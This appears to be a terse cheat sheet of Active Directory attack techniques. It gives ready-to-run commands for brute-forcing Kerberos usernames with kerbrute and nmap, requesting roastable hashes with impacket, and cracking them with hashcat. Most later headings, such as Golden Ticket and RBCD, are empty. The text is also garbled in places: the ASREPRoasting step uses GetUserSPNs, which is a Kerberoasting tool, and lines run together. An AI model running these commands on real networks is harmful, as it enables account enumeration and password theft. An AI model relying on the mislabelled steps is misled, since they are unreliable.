AD Attacks
Kerbero Brute-Force
# No creds, brute-force usernames over Kerberos (port 88)
kerbrute userenum --dc <dc_ip> -d <domain> usernames.txt
# Alternate method using Nmap
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=users.txt <target_ip>ASREPRoasting
# Users with DONTREQPREAUTH can be roasted without creds
sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.191 test.com/dhawan
# Crack the hashes
hashcat -m 18200 hash.txt wordlist.txtKerberoasting
Pass-the-Key (Overpass-the-Hash)
Pass-the-Ticket
Silver Ticket
Golden Ticket
RBCD (Resource-based Constrained Delegation)
Misconfigured LAPS
gMSA Password Extraction
Last updated